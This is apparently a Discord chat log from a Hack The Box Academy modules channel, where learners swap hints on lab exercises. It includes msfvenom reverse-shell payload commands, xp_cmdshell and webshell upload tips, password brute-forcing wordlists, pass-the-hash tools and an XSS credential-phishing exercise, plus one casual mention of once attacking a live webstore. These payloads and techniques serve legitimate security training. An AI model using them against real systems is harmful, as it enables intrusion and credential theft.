#modules

on to SMB this should be fun, Thanks @fathom pendant

:D

Hello, can someone please help me with this module: Active Infrastructure Identification

I have not been able to understand how to do it!

Thats funny I couldnt get mssqlclient to work at all but sqsh. might be which box its running off of maybe reset the box

Not sure what you're asking for ? It's quite clear tbh

Target: 10.129.207.165

vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local

Is with this, how can I add the vhost to that ip?
When I enter /etc/ "hosts" does not exist.

what are you running that you dont have /etc/hosts??

┌─[htb-ac680638@htb-lzizkyuidx]─[/etc]
└──╼ $cd /etc/hosts
bash: cd: /etc/hosts: Not a directory
┌─[✗]─[htb-ac680638@htb-lzizkyuidx]─[/etc]

I'm pretty sure that yes, I'm doing something wrong, but I don't know what it is ..

What do you think this means?

/etc/hosts: Not a directory

The error very clearly tells you exactly what your doing wrong

like no seriously what are you running where you dont have /etc/hosts

What I think is ok, yes, I'm not in the right directory, I should, but how do I do it, sorry for the question but I didn't quite understand what to do or how to enter the ip and add the vhosts.

I'm just starting in this...

If your use to using a text editor, the HTB pwn box has an app called pluma you can use to edit files

or you can do it from cli, best to stick with what you know then learn the cool kid stuff later

try sudo vim /etc/hosts

What tamper-script do I use to get flag11 on SQLMap Essentials?

/etc/hosts is a fine bro not a dir

• fiel

• file LOL

you might want to do the Intro to Infosec Fundementals path instead

yes; but you're not gonna learn that here

https://discord.com/channels/473760315293696010/1050914239172329513

Im searching through the dc

looking for info on how to take snapshots since the interface in the setting up module doesn't look familar

not sure whether this is vmware pro??

is it paid?

if not

then it's not pro

not paid

wait lemme sc

to share screenshots/images you'll need to verify your hackthebox account in #bot-commands

ohkk

I use VMware workstation pro so I don't know about the player version but I'm pretty sure you can also take snapshot with it (not 100% sure)

according to the linked thread @vital adder it's not possible

Oh 🤣

Lol it's ok

Yea. You need vmware pro for snapshots

ic ty

You can take a "snapshot" in vmware player, just shut it down, and copy the directory where all the associated .vmx* files are to another location. Then if you ever want to restore, copy those over your current files.

It's not elegant, but it works.

Also guys sorry for not being active lately Offshore been really kicking me in my nut also right now I'm traveling (force by family) hopefully I could go back to normal after the prolabs

Haha

Best of luck

Thank but my nut hurts

We're holding down the fort till you get back

😆

Haha, I know what you mean...
Whenever you think you are taking a step forward… 🥄

I always think of that movie of the Spoon Murderer. Again and again and again...
https://m.youtube.com/watch?v=9VDvgL58h_Y

YES

How's your nut I mean Offshore

I am currently taking a forced break. My laptop had to go to the repair centre

I was always nice with him, really! 🙈

I think the same thing happened to me haft way though the academy 🤣

Did you also destroy a laptop? Mine no longer wanted to work 🤣

He switched off and was dead

CPTS was probably too hard for him 🤣🤪

Nope my charger port just said I'm out one day and never come back for no reason 🤣

oof

warrantied or nah?

I think that was the last day or something

I don't know exactly what is broken. But probably also the port for the charging cable.

During the warranty period

if it's a Dell; generally you're gonna have decent luck getting it repaired under warranty even if it's on like the last day

Oh yeah I think my charging cable was rusted and to this day still no idea how tf that happened

you don't have to work with it outside in the rain 🤣

I think a little break is good for me.

yes a personal break, not a computer break

xD

Hey, can anyone remember which module went through setting up a cloud-based attack box, and more specifically, securing RDP with MFA etc.? For the life of me cannot find it.

Yep. My dad's laptop stopped charging one day and they sent a technician to fix the day after he called them

must have prosupport that nbd service comes in clutch

Yea

• depending on parts and labor availability

if you can't tell i've been shopping around

and looking at warranties

Haha

by far Dell has the best high-tier paid support

I have an MSI laptop that I got about 5 years ago. Never had any issues with it. Thing is an absolute beast

haven't heard much about MSI support

i've heard it's good tho

I only have the standard warranty package. That's why I had to send the laptop in.

Ah makes sense

My dad always pays for the highest warranty available

ah standard warranty so that send in is gonna be a week iirc

Sounds about right

Yes, i think so

I received an email yesterday that the repair is finished and they are now testing the device. They will probably send it back today

As I said, such a break after an exam is absolutely okay

I think HTB is already planning the next certificate. All the new modules point to another certificate in the web area....
Means, again a lot of learning and then again an exam.

Yea. Seems like it

Anyone about that knows question 2 of Brute Forcing Cookies??? Im stuck at the moment with using CyberChef. I can get it to decode the first part of the cookie. The middle is missing.

It doesn't include monthly cubes but you'll earn a lot by just doing modules

You must first decode the cookie with || URL Decode ||

helllllllllllo

i just start in hack wich module do you advice me

can anyone help me with how to download xfreerdp tool on my parrot OS?

I usually just utilize the vpn on my own Kali machine but the few times I have used HTB academy’s Parrot OS machine I thought I remember xfreerdp already being installed. Sorry if I am incorrect.

you are correct, the machines that are in the website do have xfreerdp, but the problem is the screen does not show me the task bar of the windows machine that I am trying to get a connection on (for example I can not access the search bar to access programs) that is why I trying to download it to my vmware parrot OS but could not figure how

Hi all, I could use a push/DM from someone regarding this module:

AD Enumeration & Attacks - Skills Assessment Part II question:

Present the contents of the flag.txt file on the administrator's desktop on the SQL01 host.

via xp_commandshell i opened a reverse shell in powershell and am "nt service\mssql$sqlexpress" now i would need a hint to do privesc and become admin

Oh my apologies. I just realized you stated “my parrot OS”. Umm..I’m not too sure about that. I attempted to ask open chat GPT but website seems to be down atm.

Have you checked privilege ?

but not work

it is a right way?

yes bro i have a SeImpersonatePrivilege enable

ok work

typo

My beef login page not working on WAN

can someone help me

You need to be more specific. What module?

i use correct password but not login & redrect to login page

If this is not module related then I can't help you further

module ? model are up to date

Gathering from this context, it is nothing module related. Please use #1024429874246590575

okay thanks

careful with spoilers

ok i got it tks

hello i am looking for help for the module login brute forcing /login form attacks

Check out the "Privileged Access" -> "Choosing enable_xp_cmdshell" Section

Anyone working with the easy lab of attacking common services?!?

Hii

where you stuck?

I got the user but not the password... I`m going through rockyou wordlist but the time will end... I couldn't find the password in the list provided....

try it with medusa

Ok!

hydra will not find it, dont no why

medusa is running now!

Hey, could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used password lists from the resources and rockyou.

you prob need to use mut list you created before

The one with 94k passes? For remote attack? I don't think I'll make it in the 90 minutes for which the lab is assigned :/

Is it really the solution?

I dont know what are you talkin about my mut list is 2.5 mb and rockyou 136mb

try creating smaller mut list

dont add everyting in it

I mean, I used the rule from resources

yeah but on which pass list

custom.rule on password.list

I dont now pass not that hard it has one special character in the end thats all I can say

Thanks 🙂

Still running medusa... my machine is about to die hahaha

anyone finished the crackmapexec skill assessment that can help me with some hint?

Hi there, Could someone tell me does wpscan can detection all the activating plugins? Because I found some vulnerable plugins on the admin page but wpscan don't detect them.

hello guys i need help here please , i modified the db and changed the amount from 5 to 99999912 but nothing change in the game .. can someone tell me to do to debugging the amount in the game for the acc to modify the amount in the game ?

hi guys I'm doing the Attacking Common Services SMTP exercises. I get the username using the RCPT mode with the enum -M command, all good, but when i telnet in to try and re-create this to check my understanding I just get "503 must have sender first"

any ideas why the RCPT mode in the script works but manually checking doesnt?

Because VRFY is the command iirc

RCPT is the send mail

in this exercise VRFY is disallowed

only the RCPT mode in the user-enum script works

haven't done that but it tells you why you got the 503, it's because you haven't specified the send to email ¯_(ツ)_/¯

The script probably does some simple name@domain thing

yeh, it must do a "MAIL FROM:test@test.com

"

I just verified, that works

when you to RCPT TO:m....@inlanefreight.htb it comes back with 250 OK

if you put a wrong username it comes back "550 Unknown user"

interesting

thanks for your thoughts Marcie

Probably why rcpt takes a bit longer

yeh, I like to telnet into pop3/imap/smtp to take a look around before just firing up the scripts so i understand what is going on

now i need to brute force this dudes passwd

ok work bro

How did you find the hash of CT059, did you do a GetUserSPNs.py attack? It didn't find anything for me, I even looked with bloodhound

Hi - any nudges on brute forcing cookies question 2? I used the python script Decodify which gives me url -> base64 but this results in gibberish. Any help?

Solved it

"sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53" can someone explain what is the use of --source-port ?

Modul Server Side Attacks, the Explanation for Apache Reverse Proxy & AJP installation does not work.

isn't it because the service you're trying to ping usually expects packets coming from a service running on this port and would block the ping otherwise?

It's not about what the service expects. It's about the firewall. For example, a firewall may block any traffic that originates from any non standard port. But if the machines behind the firewall need internet access, it would have to allow DNS which means if your packets originate from port 53 there's a good chance they will be allowed through

Thank you so much for sharing your knowledge

Remote/Revserse Port Forwarding with SSH

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

can someone check mypayload.

Metasploit

[*] 127.0.0.1 - Command shell session 56 closed.
[*] 127.0.0.1 - Command shell session 57 closed.
[*] 127.0.0.1 - Command shell session 58 closed.
[*] 127.0.0.1 - Command shell session 59 closed.
[*] 127.0.0.1 - Command shell session 60 closed.

SSH-R

debug1: client_input_channel_open: ctype forwarded-tcpip rchan 2 win 2097152 max 32768
debug1: client_request_forwarded_tcpip: listen 172.16.5.19 port 8080, originator 172.16.5.19 port 56488
debug1: connect_next: start for host 0.0.0.0 ([0.0.0.0]:8000)
debug1: connect_next: connect host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
debug1: channel 1: free: 172.16.5.19, nchannels 2
debug1: channel 0: free: 172.16.5.19, nchannels 1

I did notice on the example it goes all the way to port 61356, am I suppose to just wait?

debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000

Check out the LLMNR/NBT-NS Poisoning - from Windows section

@simple zephyr the problem is in payload option

Thank you!

Hi could someone help me?, I am stuck in File Upload Atack Skills Assessment and I managed to know the name of the directory where the files are uploaded, but when I try to add the name of a file that I have uploaded but it gives me 404 not found. I think I am in the correct path because I write the name of the folder and the date before the file. I tried with a normal jpeg but it doesn´t show

DM

what option should I be using? this was the one from the module.

@simple zephyr U need to change the payload options to what u used when creating a payload

Hello! I`m working with the easy lab of attacking common services module! I got username and password but I can't any way to upload a shell... could I use msfconsole... I'm trying some modules but no luck...

hello can you help me.
I am in the SESSION SECURITY - Skills Assessment module.

Anyone working with the attacking common services module?!

Hey guys! I am in need of some help with a certain exercise that I've been struggling with for the past hour. I'm currently in the 'Repeating Requests' section of the 'Using Web Proxies' module, and no matter what I try using BurpSuite, I just can't get a hold of the second flag. What I've constantly tried is repeating commands like 'ls, pwd, cat, etc...' on the directories that I have, but all to no avail. I'll keep grinding at it, but if someone could help, I would appreciate it 😉

guys tell me how i should start hacking and making codes

You'll have to jog my memory on that one. I found it fairly straight forward so I don't have good notes on jt. Feel free to dm me

im a little confused by this module's question https://academy.hackthebox.com/module/33/section/194 it says to login as the user tom but.... log in where?

trying to connect to the target spawned through a browser or mysql doesn't seem to work

tried both with and without port specified

nevermind im dumb

i was typoing the ip

just sent ya a friend request

i am having trouble the final step in https://academy.hackthebox.com/module/31/section/599. i have a python program written to make an input which i believe changes the stack to return a "leavemsg" call to the middle of a noop field that falls into a reverse proxy but it does not work and i can not see what i missed or what i am doing wrong. i would appreciate some hints on how to figure out what i am doing wrong in gdb.

What's a man got to do to discover the FTP port for the Attacking FTP section in the Attacking Common Services module? having flags -p 1-65335, -p-, -T 4 pr -T 5, aren't working in discovering the port

22, 53, 139, 445 are the only ones that keep showing up no matter what i try

have you tried resetting the target

Only about 13 times now

you are running nmap with sudo rights, correct?

that , i was not doing,

attempting with sudo

Fucking hell,it was the sudo lol. Thanks @autumn pilot

i requested help on the academy web site should i see something on the discord service from this request?

someone will reach out to you as soon as possible

ok thanks

is there some way to extend my instances alive time or will i need to recreate everything again?

90 minutes fixed, unless it is an exam

usually 90 minutes is more than enough to finish an exercise

You got it?!

Yep, when in doubt, SUDO everything is a lesson learned

Still had to reset the box 2 more times though lol

Yeaaahhh

Anyone working with the easy lab of attacking common services?!?!

some of the scripts/methods that nmap will use might require a sudo privilege to access certain ports/sockets and etc

I imagine the -T and -p flag might be one of those

working my way down towards that

raw sockets / raw packets

Let me know when you get there hahaha

I`ve been stuck for a while... hopefully this evening I will get some inspiration haaha

let's not dump everything, but rather try to explain it with your own words what you have tried

rather than pasting the commands and outputs

I am stuck on this
https://forum.hackthebox.com/t/web-request-get/271457

I can see a working command there

Is it the last one as some said do it without the -i flag but was still stuck

nope

Ok let me try with them and come back to you on this

Ok tried this one no luck - curl -H ‘Authorization: Basic YWRtaW46YWRtaW4=’ http:// 178.128.163.230:31903

Also cannot copy from my local machine and paste in the VM 😦

So annoying have to log into my evernote

make sure to use the proper quotes as some of them are formatted and shells are not fans of that

ok let me try some of them will go through them and post here my findings

Do you know how to enable copy and paste between the vm and my local machine as i can copy and paste from VM to my local machine but not the other way around 😦

So have tried this one

curl 'http:// 178.128.163.230:31903/search.php?search=le' -H 'Authorization: Basic YWRtaW46YWRtaW4=

Get this error back: curl: (3) URL using bad/illegal format or missing URL

Done i have used dictionary attack

look at your command

I have used crackmapexec

And rockyou

I tired this one curl 'http://admin:admin@178.128.163.230:31903/search.php?search=flag’

Comes back blank

have you asked yourself why it could come blank

Because i have not included the authentication parameter

do you need one?

Yes in the cheat sheet it said to include it

but why

is my next question

Don't forget to set the user credentials when you send the 'search' request

Cookies are not the only way of authenticating via curl

Thinking......🫤

Why does HTB not direct you to start or tell you to sign up for the academy? Just curious as I was struggling to start and a lot of people were asking the same question online

Other way to authenticate is through the URL vs using CRUL

because they are different platforms

I see, that’s a bit confusing

So tried with admin admin no luck 😦

HTB (not academy) is the first one that was created

and it was meant for people to push themselves into learning things that they don't know

or partly know

So academy is the way to go if you want to learn gotcha

I dont know any of this. i am sys admin but out of work and this is my only hope now

I think the high level super separation HTB does is a bit of a mistake, but its too baked into all the systems to really do anything about it now.

I am doing academy

like its extremely weird that you have to have two seperate accounts. From an end user perspective it doesnt make any sense.

Yeah that’s what threw me off was trying to sign into the academy with the regular HTB credentials

Realized I have to make a separate account

GOT IT curl -v http://178.128.163.230:31903/search.php?search=flag -u admin:admin

Silly me was putting the command in vs searching for the flag

thanks for your help

hey anyone who has done bloodhound module. anyone getting this error?

Not done that module but its a pretty classic error

your ingestor is from a too incompatible version of bloodhound

need to either update your Bloodhound or update your ingestor and run again

https://github.com/szymex73/bloodhound-convert

lol im using the ingested items given to me by the module. guess ill downgrade

or a converter even better

❤️ much love to you guys and the community for quick response

I know some people that run a docker container specifically for bloodhound to make sure everything is compatible and in sync

awesome ima try some options

havent used bloodhound in a while but I am about to take the OSEP exam so I need to get it set back up

this worked great

I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a day.

I have found user and password and I know the ip for the MS01 box but have tried multiple ways in logging into it with found credentials.

try evil-winrm

I have tried that and just tried again. Get an WinRMAuthorizationError.

Would it be okay if I DM’d you to see if I got the correct IP, credentials?

sure

Man, I'm finding the Academy modules to be slow to respond

*edit: the machines within the Academy modules

I’m a noob with discord..when clicking on your username and clicking the message icon your user doesn’t come up. Also searched for your username and doesn’t come up. Lol

what is meant by 'config file' in this question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?" in module https://academy.hackthebox.com/module/18/section/81 .. i have assumed *.conf i have a find command that gives back a single file with wha ti think are the stipulations but it is not accepted. ideas?

figured it out... it wanted jsut the file name not the entire location

Anyone know why zap browser don't load HUD?

Ad blocker probably

sometimes zap just doesnt work for me period. Not a fan. good to be aware that it exists though

hi.. doing som sql modules and can not connect to. have: error 2002 (HY000) cant connect to local MYSQL server through socket '/run/mysqld/mysqld.sock' and using correct command which is: mysql -u root +ip -P port -ppassword

and it takes time to connect.. hmm..

"The Live Engagement" (Shells & Payload)

I feel silly asking this, but for the life of me I cannot find a browser in the foothold machine we're given in order to browse the various target web servers. Am I meant to tunnel my traffic back to my actual machine (vs. the foothold VM)?

Any nudge on Command Injections/Skill assessment? I think I found the vulnerable part as it gives a "malicious request denied!" error. But that is the only thing I ve got. I couldnt find any working command. If I didnt miss something, I tried everything on the module. Nothing works The only working command gave me the flag

I don't have any ad blocker

im pretty sure there is a browser, but personally I just used a tunnel

I have tried to restart it several time but did't work

Attacking email services - I have found the creds, however I am struggling with logging in as I am unable to login to all three services. Any help?

DM me!

I think firefox & in terminal will work, but I found using a tunnel was easier

im having an issue with a basic one, and its bothering me
tier 1, starting point, machine 'Three' with the bowling pin icon

I dont understand what is wrong, seeing as even referring to the walkthrough results in the same issue

#starting-point you'll need to verify your htb account in #bot-commands

i see

Attacking SQL databases - I was able to login but only with mssqlclient.py, not sqsh. If anyone was successful in logging in via sqsh would yall mind dm'ing me I'd like to see how that method works. Cause currently I am unable to.

hi,
so I'm currently trying to solve the challenge for the phishing section of the XSS Module. I figured out a working XSS payload and created an url, which injects a malicious login form into the html code, as requested by the challenge. If I try that url myself it works perfectly fine and the credentials are being sent to the my webserver as intended. But if I send the url to the "victim" I just receive the error "Issue in sending URL!". Does anyone have a clue, what could be causing that?
I know it's probably hard to tell without seeing the actual payload, but as far as I know, I'm not allowed to post that here, right?

Hello guys, im doing the Firewall and IDS/IPS Evasion - Medium lab.

Im using this command: sudo nmap $IP -p53-sS -Pn -n --disable-arp-ping --packet-trace --source-port 53, so i can pass through the filtered 53 port, but instead of saying open, still say´s filtered

how can i find a way to open the filtered port, so i can connext via ncat?

Good evening, Anyone working with the attacking common services easy Lab!!!

Does it take a while for the Nessus Skills Assessment to load?

yes

red teaming? no

Hello. I finally got my discord working. I am new to hacking and studying to become a Ptester. As well as python. I am stuck on a question on linux and was looking for someone to point me in the right direction

If you tell us which module, which section and which question you are in, we can help you for sure.

i am master of footprinting

footprinting labs were cool

not at all. Red teamers dont use nessus. Pentesters sometimes use it but not red teamers

I haven't done that module but is there a domain associated with that account ie. WORKGROUP or DOMAIN.XYZ

if you can't find the account name on the box you're logged in to then you might be able to find it somewhere else.
blatant hint: ||check the domain controller.||

Hey everyone, I'm not looking for the answer to this problem but if anybody can point me in the right direction to find the answer would be greatly appreciated

Been stuck on this for a while

sounds like the format of your id_rsa key isnt valid

does it need to be unencrypted?

might be why it is showing invalid format

Fixed it

I copied and pasted it into note pad and then copy pasted it into CL and it worked

not sure what was wrong with it but that fixed it

Ok, so i have a question about log poisoning. Im on the skills assesment for file inclusion. Cant really say what my issue is without giving away half the skills assesment so if anyone who finished that module is around to help out id greatly appreciate it

the first thing to know about log poisoning is that if your payload fucks up that it gg no re, you gotta reset the box

yea i know. Can I dm you?

second thing is that you can access the error log after it messes up to get the php error output

I cannot believe i didnt think of that

if it makes you feel better I originally learned that lesson about 14ish years ago against a live target for a malaysian webstore.

Yea. Now that im thinkign about it it makes sense. Again , i cant believe i didnt think of that

thanks for the nudge

the payload was also super finicky for me. I had to do it in burp

gotcha

I got it. And now i see why the payload didnt work lmao

thats so annoying

Mood

https://academy.hackthebox.com/achievement/86862/23

dnsenum sure is one of those hurry up and wait... a life time for the scan to complete

hey everyone, im stuck on the knowledge check in the getting started module. Got a shell and the user flag, but unsure how to escalate privileges. sudo -l shows: "User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php"

I remember this from a previous module but when I try to run the command as root it does nothing. no error, no ouput or anything.

Can anyone provide me with a little nudge in the right direction?

have a look at GTFOBins

I've been looking, maybe I dont have the syntax right?

"sudo -u root /usr/bin/php <command>"

You’re gonna love Password Attacks

||you don't need to specify -u root||

Hi!
you passed it? brute forcing the support.us account by grep '[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$' > testlist.txt wordlist, but can't login too

#modules message

Hmm that link just brings me to this channel, not a specific message, if that was your intention

it's linking to my spoilered message

Hii

might be a shell issue as well, i don't remember everything but i was trying to do linux privesc on a box using gtfobins and the commands just wouldn't work until i used a more stable shell

I was thinking that as well. When I run "sudo su /usr/bin/php" the output is just blank and I cant do anything

wait not that

did you try running the set of commands on gtfobins?

Set? I just see a list

https://gtfobins.github.io/

there's a search bar on the site, try looking up php

Thanks! Maybe file upload? To get linenum.sh uploaded

iirc that should be on the box already

or do I not even need linenum.sh now.. Damnit I'm confused haha.,

usually if sudo -l returns a command you can run as root you won't need an automated enumeration tool for privilege escalation paths

Right, okay, thats what I just now realized. Hmm..

So this is where the PHP commands from gtfobins would come in handy yes?

i would say they're worth a shot

jfc, thank you, i feel stupid now haha. all part of the process I suppose.

anyone around that has done the skills assessment for broken authentication?
just got it!

@glacial matrix I would hint at making sure you are using the restrictions for passwords in your grep

Hi, I'm trapped at "AD Enumeration & Attacks - Skills Assessment Part I" in question 4: "Submit the contents of the flag.txt file on the Administrator desktop on MS01 ". Any hints about how to get the IP address for MS01? I only need that hint

Conduct an Nmapscan would be helpful

i miss the ":" and
what should I do next?

?

Thank you! what should I do next? I logged into support.us, found cookies separated by ":" But I can't find the recipe

you asked how to figure out the IP-Adress of MS01

You only have a webshell. You cannot directly apply Nmap

Also, even If I Do, there might be multiple machines and I have to know which one of those is MS01

Have you done "Pivoting, Tunneling, and Port Forwarding" Module?

Yes, but it is a Active Directory Module related. So it is more directly related with Domains

look back at the Pivoting Module. Try to gain a reverse shell and use it as a proxychain

Hi all

in footprinting module... section ipmi. in ladt question we have to prove the password. which needs to be brute force with hastcat. does hashcat take too much time to crack it. i use the command hashcat -m 7300 ipmi.txt -a 3.
Please let me know.

Thanks 👍

sure also you may want to remove spoiler

not more than 5-10 minutes

Try with rockyou also you can just copy the given hashcat command from the section

@autumn pilot @vital adder . i used the same commands which is given in the section but it already takes half an hour. i use rockyou list with john tool.

are you sure you are not using the rockyou archive rather than the txt file

Hello, hope everyone is good.
I need some help in a web challenge called weather app.
I've been working on it for several days now and I'm stumped.
Can someone dm me for some hints or just a nudge.
I can list a few things I already tried and didn't work.
Thanksss

@autumn pilot i am using rockyoy.txt.....

anyone had issue when trying to RDP to the windows machine in shells & payloads module. when ever I use xfreerdp to connect to the machine, it disconnect after one minute saying there is an error. can someone help?

even after I try to connect again, it says failed to connect

I used gnome-boxes for this one!

thanks 👍 @autumn pilot @vital adder .... i cracked it.

Good morning, anyone who can provide some hints with the attacking common services easy lab! I'm halfway but currently running out of ideas...

use some of the commands from previous sections

I`m going through several in mysql but no luck...

i just finished the attacking common services hard lab and i need a strong drink and a shower from the sweat

you'll want to try some other word lists....

you'll also need to work out how to put up a webshell and where to drop it

the phpinfo page might be worth looking at 😉

I got credentials but can`t find how to locate the file where the php web page is located...

should I be able to log in through ftp?

check all your ftp ports, there is a mention of a https service also

the key question is how can you upload a bit of php to an area where you can get the server to execute it by browsing to that php page

there is apparently another way of doing it but thats how i did it

i think there is a text file lying around that host which can help answer the above 😉

you'll get there mate

you'll be pleased to know the "easy" lab is way harder than the medium lab

and the hard lab is hard lol

Hahahahahah

I understand what I need to do but I don`t see how... I upload through the mysql console I assume...

yeh you may want to investigate select into outfile............

thats enough help from me LOL

I read the "https://mariadb.com/kb/en/select-into-outfile/"

everytime I need to deal with SQL I`m screwed...

the command you need is in the module

you just need to work out what php you need and where to send it

I must change this command but I don`t know from where to start...

well firstly you're trying to send to a linux directory when you are on a windows box

secondly you are missing the first part of the SELECT ... INTO OUTFILE (i.e. select!)

but your general idea is right

Thanks!! I will keep trying...

good luck, im sure we'll talk again when you get to the hard lab....

Hi could you help me? Module 147 and section 1320 I am at "Credential Hunting in Linux"finally I was able to log in as Kira but i cant find anything after that. Cannot read shadow file..where can I find Will password? somebody give me a hint what to do? Thanks

can someone help me out with Meterpreter Tunneling & Port Forwarding I have a few questions with the payload

p3tA00@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

are they meant not to provide you with a payload that works? I found one that does finally and I get my connection back using

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 -f elf -o backupjob3 LPORT=8

ignore the IP's i just copied from the module

Any one doing Dante-Pro labs? I am having my time with some machine. Just rooted NIX-01, 02. Any one up there?

I would prefer chisel. It is easier. I am doing Dante-Pro lab using Chisel.

I am going to DM you

Were you just using netcat to listen for it? The first one is a staged meterpreter payload, so you need to be using multi/handler.

no i was using meterpreter, but got this error

ubuntu@WEB01:~$ ./backupjob1 
Segmentation fault (core dumped)

and i would get session closed on the meterpreter

Is the box x64?

Nevermind, both were x64 payloads.

I don't see any reason it shouldn't have worked, unless there was a problem in transfer.

#prolabs-dante you'll need to verify your htb account

Hi everyone. I just joined and is taking the p-test path, on the Linux mod I was wondering if there is a hacking game a noob like me can play on htb. Or do I need to learn a little more. My programme language is a python novice.

Has anyone figured out flag11 (case11) on SQLMap Essentials? I've tried the tamper=between and tamper-=space2comment, as well as quite a few others. I've also increased the level and risk. No luck. Any help would be much appreciated!

if you want some prior knowledge before trying the boxes on the main HTB platform, i suggest completing the "Cracking Into HTB" path on HTB Academy

Never mind. I was making a boneheaded error.

although Information Security Foundations is an essential path if you want a deep understanding

Attacking Common Services - Attacking SQL Databases: Man I am a bit stumped, tried using mssqlclient.py and it works it however will eventually lag out. But after this I am stuck on figuring out how to traverse after logging in(hopefully there is a more stable way to log in.). Anyone mind nudging me in the right direction?

I'm not sure it's an error, so I'll rather post it here. Course "HTTPS/TLS Attacks", section "Bleichenbacher & DROWN".
"Download the zip file from the question above. You were able to capture TLS traffic between a client and the target server that you want to decrypt. Execute a Bleichenbacher Attack to obtain the premaster secret. Enter the unpadded premaster secret. The attack may take up to 30 minutes. Note: The IP address in the pcap file is different so you cannot use the -pcap option. Look at the help of the tool and find a way to pass the encrypted premaster secret to execute the attack."
Actually, the -pcap option can be used. Just port forward 127.0.0.1:443 to the remote endpoint, e.g. socat TCP-LISTEN:443,fork TCP:138.68.177.6:32396

By the way, that same endpoint does not seem to be working.
EDIT: working now, after a restart.

can someone help me with that?

from which module/section is that

What tools do yall use to pass the hash?

this is javascript It's a code I found, I suspect it's trojan I need help

this is not the channel for that

where is it sir ?

if there is winrm you can just use evil winrm or if it is AD stuff you can use mimikatz or rubeus

maybe #general

this channel is only for discussion about sections or modules in academy

for the stable thing try with sqsh and also if you are still stuck in that section shoot me a dm

what do you want to do

if you need some more hacking knowledge give both of these video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

Ima keep trying for a bit but you might expect a dm lol

Im working on Attacking Common Services - Attacking SQL databases: Captured the hash of the svc account and now trying to figure out how to pass it back to login with that service account to the mssql service.

have you tried to crack it?

pls give the module and section name not the number in the url also and your next step is to take over the ||will user|| and for that hint check that user home directory

Yea tried using hashcat tho I wasn't able to use the tool as it didn't like the hash

play around with it a bit and you will get it

this is not the place for that use ++verify at #bot-commands and ask that at #challenges

if hashcat doesn't work always try with john 🤣

hint try with ||different protocol||

Attacking Common Services - Attacking SQL Databases: IF anyone needs help or guidance please feel free to dm me in the future. As well as for other sections in the module. Finally got the flag and only thing left is the labs at the end of the section.

So under module "Getting Started" first optional exercise it wants us to grab the banner. I have no clue what I'm doing wrong when I try ( nc ipaddress port) with it stating "time out". Any assistance would be appreciated ! ( path pen tester / getting started / basic tools)

One sec

id input the screen shot but it wont let me

@proud moon Are you using the pwnbox? And what command are you running?

Hello

yea pwnbox

nc ipaddress 22

Whenever I try to setup a netcat listener it’s unsuccessful

I tried it on 2 boxes so far

@proud moon Look at the target number highlighted in green in the question section. What else beside and IP address is attached to it?

@shadow nest Can ya show what command ya running? typical netcat listener is nc -lvnp (desired port)

I tried the most simplest php shells

Yes I tried nc -lnvp 1234

I am following the walkthrough step by step

One box is the Log4J

@iron basin are you talking about the ":" after the target ip address?

Yes, remember sometime services can run on other ports beside the default ones.

what in the world, I tried that before and it didnt work lol

but now it did, thank you and yes i remember haha

Are you connected to the VPN?

Does the VM require a VPN connection?

All good, it gets me every now and then ;D @proud moon

Anyone have some free time tonight to help me. I used my own kali vm and htb platform

Same issue

@shadow nest Yeah you using pwnbox or own vm

If ya want dm me so I can see your shell code and commands @shadow nest

Hiii

I would greatly appreciate some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack. Been stuck for a long time.

Have found admins hash with system level privileges on SQL01 box and have chisel/pivoting tool running on victims box and it running on ssh attacker machine but receiving a connection error message when trying to pass the hash utilizing proxychains and evil-winrm

@iron basin @autumn pilot I am using the open vpn connection

For both my vm and htb platform

Yes I will send it over @iron basin

My fault picking up the kids from school lol

@shadow nest Can ya try the pwnbox as I have found openvpn sometimes to be finnicky

all good

I checked will directory its empty

Very annoying, anyone have connectivity issues with certain labs?

nope

3;

Seems to me all my boxes no matter the section of this module continue to disconnect or timeout after around 5mins.

vpn issue?

@high sentinel Using pwnbox

just try running ping box in the background and check the output when the issue occurs

if the ping works just fine the whole time, i'd say that's some application level issue then

I dont know its weird behavior. I just reset the target machine and pwnbox and the target is unreachable. Earlier it worked then now its half n half, with half the time working and when it does it cuts out eventually.

hmm

maybe try running wireshark in the background as well? I think pwnbox should have no issue with vpn connectivity as long as there are no issues with htb infrastructure but i personally don't use it so i'm not like 100 % sure. Why don't you use your own vm?

I do when Im home but away I use pwnbox. Also find a vm over the browser just really cool for some reason haha

Yeah, reset the machine, ran ping, worked up until the 82nd icmp_seq and them disconnected again. Maybe its a feature of the lab I am working on? The lab is Attacking Common Services - Easy

I don't think that's a feature

still need help?

Yeah

I was suggesting that cause I thought my brute forcing mayve caused me to get disconnected but when i reset the boxes and target again and just ran ping still got disconnected.

~~ Who says you need PtH? Bloodhound reveals all ~~ nvm im dumb, was looking at the wrong notes

well, not attacking the box and still being disconnected sounds like it's not a feature

DM me, dont wanna spoil anything here

Ye... just went to another module to try out by chance if it would work and still getting them same thing. Ima hop off but later ill see if its still doing it and if so try to analyze whats going with wireshark like you said

